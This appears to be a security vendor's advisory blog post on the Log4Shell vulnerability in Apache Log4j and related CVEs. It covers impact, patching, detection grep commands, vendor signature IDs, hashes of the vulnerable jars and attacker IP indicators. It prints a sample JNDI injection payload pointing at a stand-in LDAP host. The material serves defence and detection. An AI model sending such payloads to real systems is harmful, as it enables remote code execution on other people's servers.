.svg)
.svg)
The Blue Report 2024
Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.
Picus Labs has updated the Picus Threat Library with attacks that exploit CVE-2021-44228 Remote Code Execution (RCE) vulnerability affecting Apache Log4j - the ubiquitous Java logging library.
What is the CVE-2021-44228 Log4j Unauthenticated RCE Vulnerability?
Apache Log4j versions prior to 2.15.0 do not protect against attacker-controlled LDAP and other JNDI-related endpoints. When message lookup substitution is enabled, an attacker with control over log messages or log message parameters can execute arbitrary code loaded from LDAP servers. This vulnerability is also dubbed Log4Shell or LogJam.
Test your security controls now: Prevent Log4Shell Exploits with Picus
The CVE-2021-44228 is a remote code execution vulnerability that can be exploited without authentication. Therefore, CVE-2021-44228 is an unauthenticated RCE vulnerability affecting Apache Log4j versions before 2.15.0.
Log4j Vulnerability Updates (CVE-2021-44832, CVE-2021-45105, CVE-2021-45046)
Update (December 28, 2021): A new vulnerability (CVE-2021-44832) is found in Apache Log4j2 versions 2.0-beta7 through 2.17.0. CVE-2021-44832 is an Arbitrary Code Execution vulnerability. Since it can be exploited by an attacker with permission to modify the logging configuration, its severity is lower than Log4Shell (CVE-2021-44228). Its base CVSS score is 6.6 (medium). This vulnerability is fixed in Log4j versions 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).
Update (December 16, 2021): Since we published this blog post, 2 new vulnerabilities have been discovered.
Apache Log4j versions prior to 2.16.0 are vulnerable to information leaks and remote/local code execution (CVE-2021-45046) flaw. It was first discovered as a denial of service vulnerability. However, later found out that it is also a remote/local code execution vulnerability, which increases its CVSS score from 3.7 (low) to 9.0 (critical).
CVE-2021-45105 is another vulnerability found in Apache Log4j versions prior to 2.17.0. It is a denial of service vulnerability with a CVSS score of 7.5 (high). Similar to CVE-2021-45046, malicious recursive lookup sent via Thread Context Map (MDC) input causes StackOverflowError in this vulnerability.
.png?width=404&name=image%20(57).png)
To See the Full Infographic, Click Here
What is the Impact of the Log4j RCE Vulnerability?
CVE-2021-44228 vulnerability enables remote code executions on systems running vulnerable Log4j versions and allows the attacker full control of the affected server. For example, attackers can exploit CVE-2021-44228 to run malicious codes and install webshells as backdoors on vulnerable systems for maintaining access and post-exploitation.
CVE-2021-44228 is a vulnerability that affects the default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. Thus, it is a high-impact vulnerability affecting widely used software.
Update: CVE-2021-45046 vulnerability also enables remote code execution. However, the delivery of the payload is different from CVE-2021-44228 vulnerability. Exploiting this vulnerability requires control over Thread Context Map input data where the attacker needs to create a malicious payload using JNDI Lookup Pattern. When exploited, this vulnerability results in information leak and remote code execution in some environments and local code execution in all environments.
CVE-2021-45105 vulnerability enables denial of service (DoS) for Log4j versions prior to 2.17.0. Similar to CVE-2021-45046, attacker-controlled Thread Context Map input data can be leveraged to create uncontrolled recursion from self-referential lookups.
What is the Current Situation?
According to BadPackets and Cert NZ, attackers are actively scanning the Internet for systems running vulnerable Log4j versions and exploiting CVE-2021-44228. This is an expected adversary behavior for a remotely exploitable and unauthenticated code execution vulnerability.
Log4j Exploit
In order to exploit the Log4j vulnerability, the attacker must initiate the generation of a log entry containing a JNDI request. Thus, the Log4j exploit payload must be contained within logged errors such as exception traces, authentication failures, and other unexpected vectors of user-controlled input. Then, Log4j must process the exploit payload.
The exploit payload can be sent in a header field of an HTTP request. Picus Labs researchers validated the following sample payload included in the user-agent header:
|
${jndi:ldap://example.com} |
Note that you need to run a malicious LDAP server to exploit the CVE-2021-44228 vulnerability and modify the example.com part of the payload.
Update: According to the Microsoft Threat Intelligence Center, nation-state actors from various countries are already utilizing Log4j vulnerabilities for their benefit. However, it is not easy to determine where these attacks originate from because attackers are using TOR (The Onion Router) to stay anonymous.
From their TTPs (Tactics, Techniques and Procedures), it can be deduced that APTs like PHOSPORUS and HAFNIUM are mutating their ransomware using Log4j vulnerabilities. In the future, it is expected these vulnerabilities will be part of many ransomware attack campaigns.
What Should You Do for Remediation?
The CVE-2021-44228 Log4j RCE vulnerability was patched in Log4J v2.15.0 by Apache. Therefore, it is not a zero-day vulnerability. To protect against these attacks, we highly advise organizations to identify vulnerable systems on their networks and update vulnerable Log4j installations.
This vulnerability can also be mitigated in previous releases (>=2.10):
- by setting the system property "log4j2.formatMsgNoLookups" to "true"
- by removing the JndiLookup class from the classpath (example command: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Java 8u121 protects against RCE by setting the properties "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false."
Please keep in mind that Log4J v1 is no longer supported and will not receive patches to address this issue. Log4J v1 is also vulnerable to other RCE attacks, and we strongly advise you to upgrade to Log4J 2.15.0 as soon as possible.
Update: Due to new vulnerabilities found, Apache released Log4j version 2.17.0. This latest version remedies recently found CVE-2021-45046 and CVE-2021-45105 vulnerabilities.
How Can You Detect CVE-2021-44228 Vulnerability Exploitation Attempts?
Florian Roth, the Head of Research at Nextron Systems, has shared a set of YARA rules for detecting CVE-2021-44228 exploit attempts.
You can also utilize the following shell commands to search for exploitation attempts in uncompressed and compressed files respectively in the /var/log directory and all its subdirectories:
|
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log |
|
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' |
How Picus Helps Simulate and Prevent CVE-2021-44228 Exploits?
We strongly suggest simulating CVE-2021-44228 vulnerability to test the effectiveness of your security controls against Log4J attacks, determine gaps, and utilize prevention signatures to fill your security gaps using the Picus Security Control Validation Platform.
Just click Start to see and try how you can simulate Log4j attacks and obtain prevention signatures using Picus with just a few clicks.
Test your security controls now: Prevent Log4Shell Exploits with Picus
Picus Threat Library includes the following threat for CVE-2021-44228 vulnerability. Moreover, it contains 1500+ vulnerability exploitation and endpoint attacks in addition to 11.000+ other threats as of today.
|
Threat ID |
Action Name |
Attack Module |
|
21296 |
Apache Log4j Web Attack Campaign |
Web Application |
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address CVE-2021-44228 Log4J RCE and other vulnerability exploitation attacks in preventive security controls. Currently validates signatures are given below:
|
Security Control |
Signature IDs |
Signature Name |
|
Forcepoint NGFW |
Generic_CS-Log4j-Remote-Code-Execution |
|
|
Forcepoint NGFW |
HTTP_CS_Log4j-Remote-Code-Execution |
|
|
Palo Alto Networks NGFW |
91991, 91994, 92001 |
Apache Log4j Remote Code Execution Vulnerability |
|
Check Point NGFW |
asm_dynamic_prop_CVE_2021_44228 |
Apache Log4j Remote Code Execution (CVE-2021-44228) |
|
FortiGate NGFW |
51006 |
Apache.Log4j.Error.Log.Remote.Code.Execution |
|
Snort IPS |
2034655 |
ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228) |
|
Snort IPS |
2034647 |
ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) |
|
Snort IPS |
2034658 |
ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228) |
|
Snort IPS |
2034648 |
ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228) |
|
Snort IPS |
2034654 |
ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228) |
|
Snort IPS |
2034668 |
ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228) |
|
Snort IPS |
2034649 |
ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) |
|
Snort IPS |
2034657 |
ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228) |
|
Snort IPS |
2034650 |
ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228) |
|
Snort IPS |
2034653 |
ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228) |
|
Snort IPS |
2034667 |
ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228) |
|
Snort IPS |
2034651 |
ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228) |
|
Snort IPS |
2034656 |
ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228) |
|
Snort IPS |
2034652 |
ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228) |
|
Snort IPS |
2034659 |
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228) |
|
Snort IPS |
2034659 |
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228) |
|
Snort IPS |
2034660 |
ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228) |
|
Snort IPS |
2034673 |
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228) |
|
Snort IPS |
2034661, 2034662 |
ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228) |
|
Snort IPS |
2034665, 2034666 |
ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228) |
|
Snort IPS |
2034663, 2034664 |
ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228) |
|
Snort IPS |
58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58725, 58737, 58738, 58739, 58744 |
SERVER-OTHER Apache Log4j logging remote code execution attempt |
|
F5 BIG-IP ASM |
200104772 |
JNDI Injection Attempt (Content) |
|
F5 BIG-IP ASM |
200104769 |
JNDI Injection Attempt (Header) |
|
F5 BIG-IP ASM |
200104768 |
JNDI Injection Attempt (Parameter) |
|
F5 BIG-IP ASM |
200104723 |
JNDI Injection Attempt (ldap) (Header) |
|
F5 BIG-IP ASM |
200104725 |
JNDI Injection Attempt (rmi) (Header) |
|
F5 BIG-IP ASM |
200004451 |
JSP Expression Language Expression Injection (2) (Header) |
|
F5 BIG-IP ASM |
200004450 |
JSP Expression Language Expression Injection (2) (Parameter) |
|
F5 BIG-IP ASM |
200104773 |
JSP Expression Language Expression Injection (3) (Content) |
|
F5 BIG-IP ASM |
200104771 |
JSP Expression Language Expression Injection (3) (Header) |
|
F5 BIG-IP ASM |
200104770 |
JSP Expression Language Expression Injection (3) (Parameter) |
|
F5 BIG-IP ASM |
200004474 |
JSP Expression Language Expression Injection (3) (URI) |
|
Cisco Firepower NGFW |
58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58723, 58724, 58725, 58737, 58738, 58739, 58742, 58744 |
SERVER-OTHER Apache Log4j logging remote code execution attempt |
|
Citrix Web App Firewall |
999078 |
WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via BODY (CVE-2021-44228) |
|
Citrix Web App Firewall |
999077 |
WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via FORM (CVE-2021-44228) |
|
Citrix Web App Firewall |
999079 |
WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via HEADER (CVE-2021-44228) |
|
Citrix Web App Firewall |
999080 |
WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via URL (CVE-2021-44228) |
|
Citrix Web App Firewall |
999077 |
web-misc apache log4j - remote code execution vulnerability via form (cve-2021-44228) |
|
Citrix Web App Firewall |
999079 |
web-misc apache log4j - remote code execution vulnerability via header (cve-2021-44228) |
|
FortiWeb Web Application Security |
90490119, 90490120 |
Known Exploits |
|
McAfee NSP |
0x4529f700 |
HTTP: Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) |
|
ModSecurity |
932100 |
Remote Command Execution: Unix Command Injection |
|
ModSecurity |
932130 |
Remote Command Execution: Unix Shell Expression Found |
|
TippingPoint TPS |
40627 |
HTTP: JNDI Injection in HTTP Request |
We will update the above list when Picus Labs validate the signatures of other vendors/products.
Which Log4j Versions are Vulnerable?
CVE-2021-44228 vulnerability affects Apache Log4j versions 2.0 to 2.14.1. SHA-256 hashes and default filenames of all vulnerable Log4j versions are given in the below table:
| Filename | SHA-256 Hash |
| ./log4j-2.0-alpha1/log4j-core-2.0-alpha1.jar | 006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85 |
| ./apache-log4j-2.0-alpha2-bin/log4j-core-2.0-alpha2.jar | bf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6 |
| ./apache-log4j-2.0-beta1-bin/log4j-core-2.0-beta1.jar | 58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae |
| ./apache-log4j-2.0-beta2-bin/log4j-core-2.0-beta2.jar | ed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4 |
| ./apache-log4j-2.0-beta3-bin/log4j-core-2.0-beta3.jar | dbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e |
| ./apache-log4j-2.0-beta4-bin/log4j-core-2.0-beta4.jar | a38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8 |
| ./apache-log4j-2.0-beta5-bin/log4j-core-2.0-beta5.jar | 7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b |
| ./apache-log4j-2.0-beta6-bin/log4j-core-2.0-beta6.jar | 4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47 |
| ./apache-log4j-2.0-beta7-bin/log4j-core-2.0-beta7.jar | 473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6 |
| ./apache-log4j-2.0-beta8-bin/log4j-core-2.0-beta8.jar | b3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02 |
| ./apache-log4j-2.0-beta9-bin/log4j-core-2.0-beta9.jar | dcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d |
| ./apache-log4j-2.0-bin/log4j-core-2.0.jar | 85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c |
| ./apache-log4j-2.0-rc1-bin/log4j-core-2.0-rc1.jar | db3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a |
| ./apache-log4j-2.0-rc2-bin/log4j-core-2.0-rc2.jar | ec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0 |
| ./apache-log4j-2.0.1-bin/log4j-core-2.0.1.jar | a00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d |
| ./apache-log4j-2.0.2-bin/log4j-core-2.0.2.jar | c584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d |
| ./apache-log4j-2.1-bin/log4j-core-2.1.jar | 8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc |
| ./apache-log4j-2.2-bin/log4j-core-2.2.jar | c830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a |
| ./apache-log4j-2.3-bin/log4j-core-2.3.jar | 6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2 |
| ./apache-log4j-2.4-bin/log4j-core-2.4.jar | 535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6 |
| ./apache-log4j-2.4.1-bin/log4j-core-2.4.1.jar | 42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239 |
| ./apache-log4j-2.5-bin/log4j-core-2.5.jar | 4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997 |
| ./apache-log4j-2.6-bin/log4j-core-2.6.jar | df00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6 |
| ./apache-log4j-2.6.1-bin/log4j-core-2.6.1.jar | 28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e |
| ./apache-log4j-2.6.2-bin/log4j-core-2.6.2.jar | cf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392 |
| ./apache-log4j-2.7-bin/log4j-core-2.7.jar | 5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4 |
| ./apache-log4j-2.8-bin/log4j-core-2.8.jar | ccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa |
| ./apache-log4j-2.8.1-bin/log4j-core-2.8.1.jar | 815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e |
| ./apache-log4j-2.8.2-bin/log4j-core-2.8.2.jar | 10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c |
| ./apache-log4j-2.9.0-bin/log4j-core-2.9.0.jar | dc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae |
| ./apache-log4j-2.9.1-bin/log4j-core-2.9.1.jar | 9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d |
| ./apache-log4j-2.10.0-bin/log4j-core-2.10.0.jar | f35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d |
| ./apache-log4j-2.11.0-bin/log4j-core-2.11.0.jar | 5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3 |
| ./apache-log4j-2.11.1-bin/log4j-core-2.11.1.jar | d4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d |
| ./apache-log4j-2.11.2-bin/log4j-core-2.11.2.jar | 3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100 |
| ./apache-log4j-2.12.0-bin/log4j-core-2.12.0.jar | 057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3 |
| ./apache-log4j-2.12.1-bin/log4j-core-2.12.1.jar | 5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c |
| ./apache-log4j-2.13.0-bin/log4j-core-2.13.0.jar | c39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3 |
| ./apache-log4j-2.13.1-bin/log4j-core-2.13.1.jar | 6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992 |
| ./apache-log4j-2.13.2-bin/log4j-core-2.13.2.jar | 54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b |
| ./apache-log4j-2.13.3-bin/log4j-core-2.13.3.jar | e5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1 |
| ./apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar | 68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa |
| ./apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar | 9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463 |
Indicators of Compromise (IOCs)
It has been observed that the attached IP addresses are exploiting CVE-2021-44228 Log4j vulnerability. Although most of them are IP addresses of TOR exit nodes and blocking them may result in false positives, it is suggested to block these addresses in such critical cases.
| 18.27.197.252 | 171.25.193.25 | 185.220.101.34 | 185.220.101.158 | 204.8.156.142 | 164.90.199.216 |
| 23.129.64.131 | 171.25.193.77 | 185.220.101.35 | 185.220.101.161 | 205.185.117.149 | 167.99.164.201 |
| 23.129.64.141 | 171.25.193.78 | 185.220.101.36 | 185.220.101.163 | 209.127.17.242 | 167.99.172.58 |
| 23.129.64.146 | 178.62.79.49 | 185.220.101.42 | 185.220.101.168 | 209.141.41.103 | 167.99.172.213 |
| 23.129.64.148 | 181.214.39.2 | 185.220.101.43 | 185.220.101.169 | 45.153.160.131 | 185.220.100.241 |
| 45.12.134.108 | 185.38.175.132 | 185.220.101.45 | 185.220.101.172 | 45.153.160.138 | 185.220.101.37 |
| 45.155.205.233 | 185.83.214.69 | 185.220.101.46 | 185.220.101.175 | 62.76.41.46 | 185.220.101.41 |
| 46.166.139.111 | 185.100.87.41 | 185.220.101.49 | 185.220.101.177 | 68.183.44.143 | 185.220.101.57 |
| 46.182.21.248 | 185.100.87.202 | 185.220.101.54 | 185.220.101.179 | 68.183.198.247 | 185.220.101.134 |
| 51.15.43.205 | 185.107.47.171 | 185.220.101.55 | 185.220.101.180 | 88.80.20.86 | 185.220.101.144 |
| 51.255.106.85 | 185.129.61.1 | 185.220.101.56 | 185.220.101.181 | 109.70.100.34 | 185.220.101.154 |
| 54.173.99.121 | 185.220.100.240 | 185.220.101.61 | 185.220.101.182 | 109.237.96.124 | 185.220.101.160 |
| 62.102.148.69 | 185.220.100.242 | 185.220.101.129 | 185.220.101.185 | 116.24.67.213 | 185.220.101.171 |
| 72.223.168.73 | 185.220.100.243 | 185.220.101.138 | 185.220.101.189 | 134.122.34.28 | 185.220.101.186 |
| 81.17.18.60 | 185.220.100.244 | 185.220.101.139 | 185.220.101.191 | 137.184.102.82 | 185.220.102.249 |
| 104.244.72.115 | 185.220.100.245 | 185.220.101.141 | 185.220.102.8 | 137.184.106.119 | 188.166.48.55 |
| 104.244.74.57 | 185.220.100.246 | 185.220.101.142 | 185.220.102.242 | 142.93.34.250 | 188.166.92.228 |
| 104.244.74.211 | 185.220.100.247 | 185.220.101.143 | 193.31.24.154 | 143.198.32.72 | 188.166.122.43 |
| 104.244.76.170 | 185.220.100.248 | 185.220.101.145 | 193.189.100.203 | 143.198.45.117 | 193.189.100.195 |
| 107.189.1.160 | 185.220.100.249 | 185.220.101.147 | 193.218.118.231 | 147.182.167.165 | 193.218.118.183 |
| 107.189.1.178 | 185.220.100.252 | 185.220.101.148 | 194.48.199.78 | 147.182.169.254 | 195.19.192.26 |
| 107.189.12.135 | 185.220.100.253 | 185.220.101.149 | 195.176.3.24 | 147.182.219.9 | 212.193.57.225 |
| 107.189.14.98 | 185.220.100.254 | 185.220.101.153 | 195.254.135.76 | 151.115.60.113 | |
| 122.161.50.23 | 185.220.100.255 | 185.220.101.156 | 198.98.51.189 | 159.65.58.66 | |
| 171.25.193.20 | 185.220.101.33 | 185.220.101.157 | 199.195.250.77 | 159.65.155.208 |
